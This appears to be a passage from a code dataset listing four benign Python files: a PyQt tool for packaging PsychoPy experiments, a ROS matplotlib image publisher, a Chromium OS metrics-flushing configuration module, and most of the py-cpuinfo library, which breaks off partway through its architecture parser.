source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
psychopyfreezeapp.py
|
from PyQt5.QtWidgets import QMainWindow, QFileDialog, QLabel, QPushButton, QWidget, QMessageBox, QLineEdit
from PyQt5.QtCore import QSize
from psychopyfreezelib import PsychopyFreezeLib
import os
import threading
class PsychopyFreezeApp(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setWindowTitle("Psychopy Freeze")
self.setFixedSize(QSize(400, 300))
y = 20
self.maindirLabel = QLabel(self); self.maindirLabel.move(20, y)
self.maindirLabel.setText('Path:')
self.maindirLine = QLineEdit(self); self.maindirLine.move(80, y)
self.maindirLine.resize(260, 32)
self.maindirButton = QPushButton(self); self.maindirButton.move(350, y)
self.maindirButton.setText("...")
self.maindirButton.clicked.connect(self.load_main_dir)
self.maindirButton.resize(30, 32)
y += 40
self.mainfileLabel = QLabel(self); self.mainfileLabel.move(20, y)
self.mainfileLabel.setText('Main:')
self.mainfileLine = QLineEdit(self); self.mainfileLine.move(80, y)
self.mainfileLine.resize(260, 32)
self.mainfileButton = QPushButton(self); self.mainfileButton.move(350, y)
self.mainfileButton.setText("...")
self.mainfileButton.clicked.connect(self.load_main_file)
self.mainfileButton.resize(30, 32)
y += 40
self.splashLabel = QLabel(self); self.splashLabel.move(20, y)
self.splashLabel.setText('Splash:')
self.splashLine = QLineEdit(self); self.splashLine.move(80, y)
self.splashLine.resize(260, 32)
self.splashLine.setText("SPLASH.bmp")
self.splashButton = QPushButton(self); self.splashButton.move(350, y)
self.splashButton.setText("...")
self.splashButton.clicked.connect(self.load_splash_file)
self.splashButton.resize(30, 32)
y += 40
self.NameLabel = QLabel(self); self.NameLabel.move(20, y)
self.NameLabel.setText('Name:')
self.NameLine = QLineEdit(self); self.NameLine.move(80, y)
self.NameLine.resize(300, 32)
y += 40
self.StatusLabel = QLabel(self); self.StatusLabel.move(20, y)
self.StatusLabel.setText('Status:')
self.StatusMsg = QLabel(self); self.StatusMsg.move(80, y)
self.StatusMsg.setText('Standby.')
self.StatusMsg.resize(300, 32)
y += 40
self.generateButton = QPushButton("Generate!", self)
self.generateButton.clicked.connect(self.on_click_generate)
self.generateButton.resize(300,32)
self.generateButton.move(80, y)
self.buttons = (
self.maindirButton,
self.mainfileButton,
self.splashButton,
self.generateButton
)
def raise_msg(self,msg):
e = QMessageBox()
e.setWindowTitle("Psychopy Freeze")
e.setIcon(QMessageBox.Critical)
e.setText(msg)
e.setStandardButtons(QMessageBox.Ok)
e.exec_()
def load_main_dir(self):
self.main_path = QFileDialog.getExistingDirectory(self)
if self.main_path == "": return
self.maindirLine.setText(self.main_path)
self.NameLine.setText(os.path.basename(self.main_path))
path_contents = os.listdir(self.main_path)
self.mainfileLine.setText("")
if "main.py" in path_contents:
self.mainfileLine.setText(os.path.join(self.main_path, "main.py"))
else:
self.raise_msg("No main.py detected in your experiment\n"
"Please specify the file that runs your experiment!")
if "assets" not in path_contents:
self.raise_msg( "No assets folder deteccted in your experiment.\n"
"If you use assets in your experiment,\n"
"put them in folder called \"assets\".\n")
return
def load_main_file(self):
self.main_file_path = QFileDialog.getOpenFileName(self)[0]
if self.main_file_path == "": return
if not self.main_file_path.endswith(".py"):
self.raise_msg("Invalid File Type Encountered!")
return
self.mainfileLine.setText(self.main_file_path)
def load_splash_file(self):
self.splash_path = QFileDialog.getOpenFileName(self)[0]
if self.splash_path == "": return
if not self.splash_path.lower().endswith(".bmp"):
self.raise_msg("Invalid File Type Encountered!")
return
self.splashLine.setText(self.splash_path)
def on_click_generate(self):
if "" in ( self.NameLine.text(),
self.maindirLine.text(),
self.mainfileLine.text()):
self.raise_msg("Please fill in all the fields first!")
return
self.export_dir = QFileDialog.getExistingDirectory(
self, "Where to put finished executable?")
if self.export_dir == "": return
self.export_path = os.path.join( self.export_dir,
self.NameLine.text()
if self.NameLine.text().endswith(".exe")
else (self.NameLine.text() + ".exe"))
self.gen_lib = PsychopyFreezeLib(
self.NameLine.text(),
self.maindirLine.text(),
self.mainfileLine.text(),
self.export_path,
self.splashLine.text()
)
threading.Thread(daemon=True, target=self.build).start()
def build(self):
for b in self.buttons: b.setEnabled(False)
self.StatusMsg.setText('Step (1/5) Running Pyinstaller...')
self.gen_lib.pyinstaller_build()
self.StatusMsg.setText('Step (2/5) Injecting More Resources...')
self.gen_lib.module_inject()
self.StatusMsg.setText('Step (3/5) Pruning Resources...')
self.gen_lib.prune_build()
self.StatusMsg.setText('Step (4/5) Compressing into one executable...')
self.gen_lib.NSIS_build()
self.StatusMsg.setText('Step (5/5) Cleaning Up...')
self.gen_lib.clean_build()
for b in self.buttons: b.setEnabled(True)
self.StatusMsg.setText('Standby.')
os.system("start " + self.export_dir)
|
plotter.py
|
import rospy
import numpy as np
from sensor_msgs.msg import Image
from std_srvs.srv import SetBool, SetBoolResponse
import cv2
from cv_bridge import CvBridge
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
import matplotlib
import threading
class Plotter:
'''Publishes several plots of 2d data over rostopic via Image msgs
Basic Usage Example:
# Import
from mil_ros_tools import Plotter
import numpy as np
import rospy
# ROS node
rospy.init_node('my_node')
# Create
my_plotter = Plotter('my_plotter_topic')
# Publish some plots
titles = ['random data', 'sin wave']
data_size = 100
y1 = np.random.rand(data_size)
x1 = np.arange(0, y1.shape[0])
x2 = np.linspace(0, 5, data_size)
y2 = np.sin(x2)
plots = np.vstack((x1, y1, x2, y2))
my_plotter.publish_plots(plots, titles)
For another usage example see `mil_passive_sonar triggering`
Limitations:
can only stack plots vertially
all plots must have same number of points
cannot name axes
Publishing happens in another thread,
if publish_plots is called before a previous publish plots call finishes,
the most recent publish plots call will be ignored
cannot plot mutiple data sets on top of each other in the same plot
cannot change color of plots
Features:
Can be enables/disabled via the <topic_name>_enable service call
'''
def __init__(self, topic_name, w=20, h=20, dpi=150):
matplotlib.rcParams.update({'font.size': 22})
self.pub = rospy.Publisher(topic_name, Image, queue_size=1)
self.bridge = CvBridge()
self.fig = Figure(figsize=(w,h), dpi=dpi)
self.canvas = FigureCanvasAgg(self.fig)
self.enabled = True
self.thread = None
rospy.Service(('%s_enable'%topic_name), SetBool, self.enable_disable)
def enable_disable(self, req):
self.enabled = req.data
return SetBoolResponse(success=True)
def is_go(self):
return self.enabled and\
self.pub.get_num_connections() > 0 and\
(self.thread is None or not self.thread.is_alive())
def publish_plots(self, plots, titles=[], v_lines=[]):
if self.is_go():
self.thread = threading.Thread(target=self.publish_plots_, args=(plots,titles, v_lines))
self.thread.daemon = True
self.thread.start()
def publish_plots_(self, plots, titles=[], v_lines=[]):
num_of_plots = plots.shape[0]/2
for i in xrange(1, num_of_plots+1):
self.fig.add_subplot(num_of_plots, 1, i)
for i, ax in enumerate(self.fig.axes):
ax.plot(plots[i*2,:], plots[i*2+1,:])
if i < len(titles):
ax.set_title(titles[i])
if i < len(v_lines):
ax.axvline(v_lines[i])
self.canvas.draw()
s, (w, h) = self.canvas.print_to_buffer()
self.fig.clf()
img = np.fromstring(s, np.uint8).reshape(w, h, 4)
img = np.roll(img, 3, axis = 2)
for ax in self.fig.axes: ax.cla()
# make ros msg of the img
msg = self.bridge.cv2_to_imgmsg(img, encoding='passthrough')
# publish the image
self.pub.publish(msg)
def interweave(x, data):
'''Helper function of place a single x axis in every other row of a data matrix
x must be a numpy array of shape (samples,)
data must be a numpy ndarray of shape (channels, samples)
returns:
numpy ndarray of shape (channles*2, samples) where
even numbered rows are x, odd rows are the data
see mil_passive_sonar triggering for an example
'''
plots = [None] * data.shape[0]
for i in xrange(data.shape[0]):
plots[i] = np.vstack((x, data[i,:]))
plots = np.vstack(tuple(plots))
return plots
|
ts_mon_config.py
|
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrapper for inframon's command-line flag based configuration."""
from __future__ import print_function
import argparse
import contextlib
import multiprocessing
import os
import socket
import signal
import time
import Queue
from chromite.lib import cros_logging as logging
from chromite.lib import metrics
from chromite.lib import parallel
try:
from infra_libs.ts_mon import config
import googleapiclient.discovery
except (ImportError, RuntimeError) as e:
config = None
logging.warning('Failed to import ts_mon, monitoring is disabled: %s', e)
_WasSetup = False
FLUSH_INTERVAL = 60
@contextlib.contextmanager
def TrivialContextManager():
"""Context manager with no side effects."""
yield
def SetupTsMonGlobalState(service_name,
short_lived=False,
indirect=False,
auto_flush=True):
"""Uses a dummy argument parser to get the default behavior from ts-mon.
Args:
service_name: The name of the task we are sending metrics from.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
indirect: Whether to create a metrics.METRICS_QUEUE object and a separate
process for indirect metrics flushing. Useful for forking,
because forking would normally create a duplicate ts_mon thread.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
"""
if not config:
return TrivialContextManager()
if indirect:
return _CreateTsMonFlushingProcess([service_name],
{'short_lived': short_lived})
# google-api-client has too much noisey logging.
googleapiclient.discovery.logger.setLevel(logging.WARNING)
parser = argparse.ArgumentParser()
config.add_argparse_options(parser)
args = [
'--ts-mon-target-type', 'task',
'--ts-mon-task-service-name', service_name,
'--ts-mon-task-job-name', service_name,
]
# Short lived processes will have autogen: prepended to their hostname and
# use task-number=PID to trigger shorter retention policies under
# chrome-infra@, and used by a Monarch precomputation to group across the
# task number.
# Furthermore, we assume they manually call ts_mon.flush(), because the
# ts_mon thread will drop messages if the process exits before it flushes.
if short_lived:
auto_flush = False
fqdn = socket.getfqdn().lower()
host = fqdn.split('.')[0]
args.extend(['--ts-mon-task-hostname', 'autogen:' + host,
'--ts-mon-task-number', os.getpid()])
args.extend(['--ts-mon-flush', 'auto' if auto_flush else 'manual'])
try:
config.process_argparse_options(parser.parse_args(args=args))
logging.notice('ts_mon was set up.')
_WasSetup = True
except Exception as e:
logging.warning('Failed to configure ts_mon, monitoring is disabled: %s', e,
exc_info=True)
return TrivialContextManager()
@contextlib.contextmanager
def _CreateTsMonFlushingProcess(setup_args, setup_kwargs):
"""Creates a separate process to flush ts_mon metrics.
Useful for multiprocessing scenarios where we don't want multiple ts-mon
threads send contradictory metrics. Instead, functions in
chromite.lib.metrics will send their calls to a Queue, which is consumed by a
dedicated flushing process.
Args:
setup_args: Arguments sent to SetupTsMonGlobalState in the child process
setup_kwargs: Keyword arguments sent to SetupTsMonGlobalState in the child
process
Side effects:
Sets chromite.lib.metrics.MESSAGE_QUEUE, which causes the metric functions
to send their calls to the Queue instead of creating the metrics.
"""
# If this is nested, we don't need to create another queue and another
# message consumer. Do nothing to continue to use the existing queue.
if metrics.MESSAGE_QUEUE:
return
with parallel.Manager() as manager:
message_q = manager.Queue()
p = multiprocessing.Process(
target=lambda: _ConsumeMessages(message_q, setup_args, setup_kwargs))
p.start()
# this makes the chromite.lib.metric functions use the queue.
# note - we have to do this *after* forking the ConsumeMessages process.
metrics.MESSAGE_QUEUE = message_q
try:
yield message_q
finally:
message_q.put(None)
logging.info("Waiting for ts_mon flushing process to finish...")
p.join(timeout=FLUSH_INTERVAL*2)
if p.is_alive():
p.terminate()
if p.exitcode:
logging.warning("ts_mon_config flushing process did not exit cleanly.")
def _WaitToFlush(last_flush):
"""Sleeps until the next time we can call metrics.flush(), then flushes.
Args:
last_flush: timestamp of the last flush
"""
time_delta = time.time() - last_flush
time.sleep(max(0, FLUSH_INTERVAL - time_delta))
metrics.flush()
def _FlushIfReady(pending, last_flush):
"""Call metrics.flush() if we are ready and have pending metrics.
This allows us to only call flush every FLUSH_INTERVAL seconds.
Args:
pending: bool indicating whether there are pending metrics to flush.
last_flush: time stamp of the last time flush() was called.
"""
now = time.time()
time_delta = now - last_flush
if time_delta > FLUSH_INTERVAL and pending:
last_flush = now
time_delta = 0
metrics.flush()
pending = False
else:
pending = True
return pending, last_flush, time_delta
def _MethodCallRepr(obj, method, args, kwargs):
"""Gives a string representation of |obj|.|method|(*|args|, **|kwargs|)
Args:
obj: An object
method: A method name
args: A list of arguments
kwargs: A dict of keyword arguments
"""
args_strings = (map(repr, args) +
[(str(k) + '=' + repr(v))
for (k, v) in kwargs.iteritems()])
return '%s.%s(%s)' % (repr(obj), method, ', '.join(args_strings))
def _ConsumeMessages(message_q, setup_args, setup_kwargs):
"""Configures ts_mon and gets metrics from a message queue.
Args:
message_q: A multiprocessing.Queue to read metrics from.
setup_args: Arguments to pass to SetupTsMonGlobalState.
setup_kwargs: Keyword arguments to pass to SetupTsMonGlobalState.
"""
# Configure ts-mon, but don't start up a sending thread.
setup_kwargs['auto_flush'] = False
SetupTsMonGlobalState(*setup_args, **setup_kwargs)
last_flush = 0
pending = False
# If our parent dies, finish flushing before exiting.
parallel.ExitWithParent(signal.SIGHUP)
signal.signal(signal.SIGHUP, lambda _sig, _stack: _WaitToFlush(last_flush))
message = message_q.get()
while message:
metric, func, f_args, f_kwargs = message
try:
getattr(metric, func)(*f_args, **f_kwargs)
except Exception:
logging.exception('Caught an exception while running %s',
_MethodCallRepr(metric, func, f_args, f_kwargs))
pending, last_flush, time_delta = _FlushIfReady(True, last_flush)
try:
# Only wait until the next flush time if we have pending metrics.
timeout = FLUSH_INTERVAL - time_delta if pending else None
message = message_q.get(timeout=timeout)
except Queue.Empty:
# We had pending metrics, but we didn't get a new message. Flush and wait
# indefinitely.
pending, last_flush, _ = _FlushIfReady(pending, last_flush)
# Wait as long as we need to for the next metric.
message = message_q.get()
if pending:
_WaitToFlush(last_flush)
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2019, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (5, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
import os, sys
import platform
import multiprocessing
import ctypes
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id_raw = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
arch_string_raw = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return arch_string_raw
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def _program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p2 = Popen(pipe_command, stdin=p1.stdout, stdout=PIPE, stderr=PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some ARM/PPC/S390X CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_brand_string(cpu_string):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer('\(', cpu_string)]
ends = [m.start() for m in re.finditer('\)', cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match('^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^armv8-a|aarch64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
